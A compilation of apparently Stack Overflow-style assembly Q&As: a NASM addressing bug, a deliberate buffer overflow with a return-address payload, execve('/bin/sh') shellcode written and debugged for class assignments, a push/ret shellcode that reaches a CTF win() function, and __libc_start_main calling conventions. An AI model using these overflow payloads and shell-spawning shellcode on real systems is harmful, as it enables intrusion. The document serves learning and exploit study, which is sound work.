I have a small example program written in NASM (2.11.08) targeting the macho64 format. I'm running OS X 10.10.3:
bits 64
section .data
msg1 db 'Message One', 10, 0
msg1len equ $-msg1
msg2 db 'Message Two', 10, 0
msg2len equ $-msg2
section .text
global _main
extern _printf
_main:
sub rsp, 8 ; align
lea rdi, [rel msg1]
xor rax, rax
call _printf
lea rdi, [rel msg2]
xor rax, rax
call _printf
add rsp, 8
ret
I'm compiling and linking using the following command line:
/usr/local/bin/nasm -f macho64 test2.s
ld -macosx_version_min 10.10.0 -lSystem -o test2 test2.o
When I do an object dump on the test2 executable, this is the relevant snippet (I can post more if I'm wrong!):
0000000000001fb7 <_main>:
1fb7: 48 83 ec 08 sub $0x8,%rsp
1fbb: 48 8d 3d 56 01 00 00 lea 0x156(%rip),%rdi # 2118 <msg2+0xf3>
1fc2: 48 31 c0 xor %rax,%rax
1fc5: e8 14 00 00 00 callq 1fde <_printf$stub>
1fca: 48 8d 3d 54 00 00 00 lea 0x54(%rip),%rdi # 2025 <msg2>
1fd1: 48 31 c0 xor %rax,%rax
1fd4: e8 05 00 00 00 callq 1fde <_printf$stub>
1fd9: 48 83 c4 08 add $0x8,%rsp
1fdd: c3 retq
...
0000000000002018 <msg1>:
0000000000002025 <msg2>:
And, finally, the output:
$ ./test2
Message Two
$
My question is, what happened to msg1?
I'm assuming msg1 isn't printed because 0x156(%rip) is not the correct address (just nulls).
Why is lea edi, [rel msg2] pointing to the correct address, while lea edi, [rel msg1] is pointing past msg2, into NULLs?
It looks like the 0x156(%rip) offset resolves to 0x2118, which is exactly 0x100 beyond where msg1 lies in memory at 0x2018 (this is true throughout many tests of this problem).
What am I missing here?
Edit: Whichever message (msg1 or msg2) appears last in the .data section is the only message that gets printed.
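The address arithmetic in the question can be checked by hand. The sketch below is only a worked calculation using the addresses, instruction lengths and displacements shown in the dump above; the helper name rip_target is made up for illustration. A RIP-relative operand is resolved against the address of the next instruction, not the current one.

```python
# RIP-relative addressing: target = address of the NEXT instruction + disp32.
# rip_target is a hypothetical helper name, not part of any tool.
def rip_target(insn_addr, insn_len, disp):
    return insn_addr + insn_len + disp

MSG1 = 0x2018  # symbol addresses taken from the dump
MSG2 = 0x2025

first = rip_target(0x1FBB, 7, 0x156)   # lea emitted for msg1
second = rip_target(0x1FCA, 7, 0x54)   # lea emitted for msg2

print(hex(first), hex(first - MSG1))    # where the first lea points, and how far off it is
print(hex(second), hex(second - MSG2))  # same for the second lea
```

The first lea lands 0x100 bytes past msg1, while the second lands exactly on msg2, which matches the behaviour described in the question.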
I don't know about the Mach-O ABI, but if it's the same as the System V x86-64 ABI that GNU/Linux uses, then I think your problem is that you need to clear eax to tell a varargs function like printf that there are zero FP arguments (the ABI passes the number of vector registers used in al).
Also, lea rdi, [rel msg1] would be a much better choice. As it stands, your code is only position-independent within the low 32 bits of virtual address space, because you're truncating the pointers to 32 bits.
It appears NASM has a bug. This same problem came up again in "NASM 2 lines of db (initialized data) seemingly not working". There, the OP confirmed that the data was present but the labels were wrong, and is hopefully reporting it upstream.
Short Story
I am writing a simple program in assembly to simulate a buffer overflow. The buffer is 512 bytes allocated on the stack, and the read() syscall is then called on the stdin fd with a length of 4096 bytes.
The buffer overflow works perfectly when I run the payload outside GDB. But inside GDB, the read() syscall returns -EFAULT.
In this case, the overflow is supposed to overwrite the return address so that %rip reaches secret_func.
Question
Why does the buffer overflow not work inside GDB in this case?
Resources
Code test.S
.section .rodata
str1:
.ascii "Enter the input: "
str2:
.ascii "\nYou find a secret function!\n"
str_end:
.section .text
.global _start
_start:
xorl %ebp, %ebp
andq $-16, %rsp
callq main
_exit:
movl %eax, %edi
movl $60, %eax
syscall
main:
subq $512, %rsp
movl $1, %eax
movl $1, %edi
leaq str1(%rip), %rsi
movl $(str2 - str1), %edx
syscall
xorl %eax, %eax
xorl %edi, %edi
movq %rsp, %rsi
movl $4096, %edx # Intentional to create buffer overflow
syscall
addq $512, %rsp
xorl %eax, %eax
retq
# We reach this function via buffer overflow (replace return address)
secret_func:
movl $1, %eax
movl $1, %edi
leaq str2(%rip), %rsi
movl $(str_end - str2), %edx
syscall
xorl %eax, %eax
jmp _exit
objdump of compiled ELF
Disassembly of section .text:
0000000000401000 <_start>:
401000: 31 ed xor %ebp,%ebp
401002: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp
401006: e8 09 00 00 00 call 401014 <main>
000000000040100b <_exit>:
40100b: 89 c7 mov %eax,%edi
40100d: b8 3c 00 00 00 mov $0x3c,%eax
401012: 0f 05 syscall
0000000000401014 <main>:
401014: 48 81 ec 00 02 00 00 sub $0x200,%rsp
40101b: b8 01 00 00 00 mov $0x1,%eax
401020: bf 01 00 00 00 mov $0x1,%edi
401025: 48 8d 35 d4 0f 00 00 lea 0xfd4(%rip),%rsi # 402000 <str1>
40102c: ba 11 00 00 00 mov $0x11,%edx
401031: 0f 05 syscall
401033: 31 c0 xor %eax,%eax
401035: 31 ff xor %edi,%edi
401037: 48 89 e6 mov %rsp,%rsi
40103a: ba 00 10 00 00 mov $0x1000,%edx
40103f: 0f 05 syscall
401041: 48 81 c4 00 02 00 00 add $0x200,%rsp
401048: 31 c0 xor %eax,%eax
40104a: c3 ret
000000000040104b <secret_func>:
40104b: b8 01 00 00 00 mov $0x1,%eax
401050: bf 01 00 00 00 mov $0x1,%edi
401055: 48 8d 35 b5 0f 00 00 lea 0xfb5(%rip),%rsi # 402011 <str2>
40105c: ba 1d 00 00 00 mov $0x1d,%edx
401061: 0f 05 syscall
401063: 31 c0 xor %eax,%eax
401065: eb a4 jmp 40100b <_exit>
Reproduction Steps
Compile and run without GDB (working fine)
In this case, we calculate the offset of return address and replace it with secret_func address.
ammarfaizi2@integral:/tmp$ gcc -O3 -no-pie -static -nostartfiles -ffreestanding test.S -o test
ammarfaizi2@integral:/tmp$ perl -e 'print "A"x512,"\x4b\x10\x40","\x00"x5' > payload
ammarfaizi2@integral:/tmp$ ./test < payload
Enter the input:
You find a secret function!
ammarfaizi2@integral:/tmp$
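For reference, the same payload can be built with struct instead of hand-written escape bytes. This is a minimal sketch, assuming the 512-byte buffer from subq $512, %rsp and the secret_func address 0x40104b from the objdump listing; build_payload is a made-up name.

```python
import struct

BUF_SIZE = 512           # bytes reserved by `subq $512, %rsp` in main
SECRET_FUNC = 0x40104B   # address of secret_func in the objdump listing

def build_payload(buf_size=BUF_SIZE, target=SECRET_FUNC):
    # Filler up to the saved return address, then the new return
    # address as a 64-bit little-endian value.
    return b"A" * buf_size + struct.pack("<Q", target)

payload = build_payload()
print(len(payload), payload[BUF_SIZE:].hex())
```

Writing payload to a file in binary mode gives the same 520 bytes as the perl one-liner above.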
Compile and run inside the GDB (read() returns -14 (-EFAULT))
We stepped over the read() syscall and found that it returns -14. It does not read from stdin at all.
gef➤ b main
Breakpoint 1 at 0x401014
gef➤ r < input
[... GEF output elided ...]
gef➤ si 11
[... GEF output elided ...]
gef➤ x/5i $rip
=> 0x401041 <main+45>: add $0x200,%rsp
0x401048 <main+52>: xor %eax,%eax
0x40104a <main+54>: ret
0x40104b <secret_func>: mov $0x1,%eax
0x401050 <secret_func+5>: mov $0x1,%edi
gef➤ p/d $rax
$2 = -14
gef➤ shell errno 14
EFAULT 14 Bad address
gef➤
GDB and Linux Version
ammarfaizi2@integral:/tmp$ gdb --version
GNU gdb (Ubuntu 10.1-2ubuntu2) 10.1.90.20210411-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
ammarfaizi2@integral:/tmp$ uname -r
5.13.0-rc2-fresh-tea-00005-g8ac91e6c6033
ammarfaizi2@integral:/tmp$
For an assignment, I wrote the following assembly code shell_exec.asm that should execute a shell in Linux:
section .data ; declare stuff
arg0 db "/bin/sh",0 ; 1st arg
align 4
argv dd arg0, 0 ; 2nd arg
envp dd 0 ; 3rd arg
section .text
global _start
_start:
mov eax, 0x0b ; execve
mov ebx, arg0 ; 1st arg
mov ecx, argv ; 2nd arg
mov edx, envp ; 3rd arg
int 0x80 ; kernel
I used nasm -f elf32 shell_exec.asm to assemble and ld -m elf_i386 -o shell_exec shell_exec.o to link. Everything works so far: if I run ./shell_exec, the shell spawns the way I want.
Now I want to extract the shellcode (like \x12\x34\xab\xcd\xef...) from this program. I used objdump -D -z shell_exec to show all parts of the code, including section .data and all zeroes. The output is as follows:
shell_exec: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: b8 0b 00 00 00 mov $0xb,%eax
8049005: bb 00 a0 04 08 mov $0x804a000,%ebx
804900a: b9 08 a0 04 08 mov $0x804a008,%ecx
804900f: ba 10 a0 04 08 mov $0x804a010,%edx
8049014: cd 80 int $0x80
Disassembly of section .data:
0804a000 <arg0>:
804a000: 2f das
804a001: 62 69 6e bound %ebp,0x6e(%ecx)
804a004: 2f das
804a005: 73 68 jae 804a06f <__bss_start+0x5b>
804a007: 00 add %al,(%eax)
0804a008 <argv>:
804a008: 00 a0 04 08 00 00 add %ah,0x804(%eax)
804a00e: 00 00 add %al,(%eax)
0804a010 <envp>:
804a010: 00 00 add %al,(%eax)
804a012: 00 00 add %al,(%eax)
If I only have a section .text in my assembly code, I can usually just copy all the given byte values and use them as my shellcode. But in what order do the bytes go when I have two sections, namely .data and .text?
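One thing worth checking before concatenating the sections is what the .text bytes actually refer to. The sketch below decodes the immediates of the mov instructions from the listing above; mov_imm32_operands is a hypothetical helper that only handles the 5-byte mov r32, imm32 form (opcodes B8 to BF). It shows that the code embeds absolute addresses inside .data, so copied bytes would only work if those addresses held the same data in the target process.

```python
import struct

# Machine-code bytes of _start, copied from the objdump listing.
text = bytes.fromhex(
    "b80b000000"   # mov $0xb,%eax
    "bb00a00408"   # mov $0x804a000,%ebx
    "b908a00408"   # mov $0x804a008,%ecx
    "ba10a00408"   # mov $0x804a010,%edx
    "cd80"         # int $0x80
)

def mov_imm32_operands(code):
    """Collect the imm32 operand of each leading `mov r32, imm32` instruction."""
    operands = []
    i = 0
    while i < len(code) and 0xB8 <= code[i] <= 0xBF:
        operands.append(struct.unpack_from("<I", code, i + 1)[0])
        i += 5  # one opcode byte + four immediate bytes
    return operands

operands = mov_imm32_operands(text)
print([hex(v) for v in operands])
```

Three of the four immediates are the link-time addresses of arg0, argv and envp, which is why position-independent shellcode usually builds its strings on the stack instead.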
Edit 1
So, my second attempt is to write the assembly code like this:
section .text
global _start
_start:
mov ebp, esp
xor eax, eax
push eax ; -4
push "/sh " ; -8
push "/bin" ; -12
xor eax, eax
push eax
lea ebx, [ebp-12]
push ebx ; 1st arg
mov ecx, esp ; 2nd arg
lea edx, [ebp-4] ; 3rd arg
mov eax, 0x0b ; execve
int 0x80 ; kernel
This avoids using multiple sections, but sadly leads to a segmentation fault.
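It may help to look at the bytes this code leaves on the stack. The following is a small model, not the actual program: push_dword is a made-up helper that mimics a 32-bit push into a growing-downward stack, and it relies on NASM storing the characters of a string constant in memory order. Whether this is the cause of the crash is an assumption; the source does not confirm it.

```python
import struct

def push_dword(stack, value):
    """Model a 32-bit push: new data lands at the lowest address (front)."""
    assert len(value) == 4
    stack[0:0] = value

stack = bytearray()
push_dword(stack, struct.pack("<I", 0))  # push eax (zero)  -> [ebp-4]
push_dword(stack, b"/sh ")               # push "/sh "      -> [ebp-8]
push_dword(stack, b"/bin")               # push "/bin"      -> [ebp-12]

# The C string that ebx = ebp-12 points at, up to the first NUL byte.
path = bytes(stack).split(b"\x00", 1)[0]
print(path)
```

The resulting path ends in a space, so it is not "/bin/sh". If execve fails for that reason, execution would continue past int 0x80, and the code has no exit call after it.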
I have the following dump taken from gdb:
00000000004006f6 <win>:
4006f6: 55 push rbp
4006f7: 48 89 e5 mov rbp,rsp
4006fa: bf 98 08 40 00 mov edi,0x400898
4006ff: e8 8c fe ff ff call 400590 <system@plt>
400704: 5d pop rbp
400705: c3 ret
Usually this C function is never called; however, I need to write some shellcode that's less than 10 bytes to run it or get the value displayed. Here is the source of the function:
void win(){
system("/bin/cat ./flag.txt");
}
I'm still a novice at both assembly and C, so any help is appreciated.
To run the function win(), write push <function-win-address> followed by ret in the shellcode.
In your case that will be:
\x68\xf6\x06\x40\x00\xc3
\x68 is push (with a 32-bit immediate)
\xf6\x06\x40\x00 is the function address 0x004006f6 in little-endian order
\xc3 is ret
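The byte sequence can be generated rather than typed by hand. This is a sketch under the assumption that win sits at 0x4006f6 as in the dump; push_ret is a made-up name. Opcode 0x68 always carries a four-byte immediate, so the high zero byte of the address is part of the encoding.

```python
import struct

WIN_ADDR = 0x4006F6  # address of win in the dump

def push_ret(addr):
    # 0x68 = push imm32 (sign-extended to 64 bits in long mode), 0xC3 = ret
    return b"\x68" + struct.pack("<I", addr) + b"\xc3"

shellcode = push_ret(WIN_ADDR)
print(len(shellcode), shellcode.hex())
```

The result is 6 bytes, which fits the limit of fewer than 10 bytes. It does contain a zero byte, which matters if the input path stops at NUL.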
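Alternatively:
mov eax, (win addr)
call rax
Assemble this and take the opcode bytes from objdump afterwards. (In 64-bit mode the indirect call has to go through rax; mov eax zero-extends into rax.)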
I am trying to write a shellcode program that will call execve and spawn a shell. I am working in a 32-bit virtual machine that was provided for this class. The code is as follows:
section .text
global _start
_start:
;clear out registers
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
;execve("/bin/sh",NULL,NULL)
;ascii for /bin/sh;
;2f 62 69 6e 2f 73 68 3b
push 0x3b68732f
push 0x6e69622f
mov ebx, esp
mov al, 11
int 0x80
;exit(int status)
mov al, 1
xor ebx, ebx
int 0x80
I compile with nasm -f elf -g shell.asm and link with ld -o shell shell.o
When I try to run it, I get a segmentation fault. I tried using gdb to see where I made the mistake, but it segfaults even if I set a breakpoint at _start+0. It says that the segfault is at the address after the last instruction of the code.
That is, if the last instruction is at address 0x804807c, then the segmentation fault happens at 0x804807e, before any of the code has a chance to run.
Could anyone point me in the right direction so I can figure out how to fix this?
One mistake in your code is that 0x3b is not part of the ASCII encoding of the string. 0x3b is the character ';', whereas the string needs a terminating NUL byte (0x00):
;execve("/bin/sh",NULL,NULL)
;ascii for /bin/sh;
;2f 62 69 6e 2f 73 68 3b
push 0x3b68732f
push 0x6e69622f
The following code should fix this problem (x86 is little-endian, so the bytes of each dword appear in reverse order in the immediate):
;execve("/bin/sh",NULL,NULL)
;ascii for /bin/sh;
;2f 62 69 6e 2f 73 68 00
push 0x0068732f
push 0x6e69622f
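The two immediates can be derived mechanically from the string. The sketch below simply unpacks the eight bytes of the NUL-terminated path as two little-endian dwords; the variable names are arbitrary.

```python
import struct

path = b"/bin/sh\x00"                   # 8 bytes including the terminating NUL
low, high = struct.unpack("<II", path)  # "/bin" and "/sh\0" as little-endian dwords

# The stack grows downward, so the dword holding the END of the string
# is pushed first and the dword holding the start is pushed last.
print(f"push 0x{high:08x}")
print(f"push 0x{low:08x}")
```

After both pushes, esp points at the first byte of the string, which is why mov ebx, esp yields a valid path pointer.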
I'm reading http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html and trying to verify things by hand.
The disassembly of _start is given as follows:
080482e0 <_start>:
80482e0: 31 ed xor %ebp,%ebp
80482e2: 5e pop %esi
80482e3: 89 e1 mov %esp,%ecx
80482e5: 83 e4 f0 and $0xfffffff0,%esp
80482e8: 50 push %eax
80482e9: 54 push %esp
80482ea: 52 push %edx
80482eb: 68 00 84 04 08 push $0x8048400
80482f0: 68 a0 83 04 08 push $0x80483a0
80482f5: 51 push %ecx
80482f6: 56 push %esi
80482f7: 68 94 83 04 08 push $0x8048394
80482fc: e8 c3 ff ff ff call 80482c4 <__libc_start_main@plt>
8048301: f4 hlt
However my own disassembly is as follows:
0x00000000004003c0 <+0>: xor ebp,ebp
0x00000000004003c2 <+2>: mov r9,rdx
0x00000000004003c5 <+5>: pop rsi
0x00000000004003c6 <+6>: mov rdx,rsp
0x00000000004003c9 <+9>: and rsp,0xfffffffffffffff0
0x00000000004003cd <+13>: push rax
0x00000000004003ce <+14>: push rsp
0x00000000004003cf <+15>: mov r8,0x400650
0x00000000004003d6 <+22>: mov rcx,0x4005c0
0x00000000004003dd <+29>: mov rdi,0x40051c
0x00000000004003e4 <+36>: call 0x4003b0 <__libc_start_main@plt>
0x00000000004003e9 <+41>: hlt
0x00000000004003ea <+42>: nop
0x00000000004003eb <+43>: nop
So my question is simply what happened to the arguments for __libc_start_main that are pushed on the stack in the first disassembly?
My file is "ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), not stripped." i.e. dynamically linked as the file in http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html is as well.
Is this because my system is 64-bit and the system used in the link is 32-bit? Has the definition of __libc_start_main changed?
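The two listings can be compared by modelling where each calling convention places the same seven arguments. This is only a sketch: the parameter names follow my understanding of the glibc prototype of __libc_start_main and are an assumption here, and place_x86_64 and place_i386 are made-up helpers. The register order rdi, rsi, rdx, rcx, r8, r9 is the System V x86-64 order for integer arguments.

```python
# Assumed parameter order of __libc_start_main (names are illustrative).
PARAMS = ["main", "argc", "argv", "init", "fini", "rtld_fini", "stack_end"]

# System V x86-64: the first six integer/pointer arguments go in registers.
INT_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def place_x86_64(params):
    """Return (register assignment, arguments left for the stack)."""
    regs = dict(zip(INT_ARG_REGS, params))
    stack = list(params[len(INT_ARG_REGS):])
    return regs, stack

def place_i386(params):
    """i386 cdecl: every argument is pushed, last argument first."""
    return list(reversed(params))

regs, stack = place_x86_64(PARAMS)
push_order = place_i386(PARAMS)
print(regs)
print(stack)
print(push_order)
```

Read against the listings, this matches what is visible: the 64-bit code loads rdi, rcx and r8 with constants, copies rdx into r9, and pushes only one argument (push rsp), while the 32-bit code pushes all seven, ending with the address 0x8048394. The extra push of eax/rax in both versions appears to be padding for stack alignment.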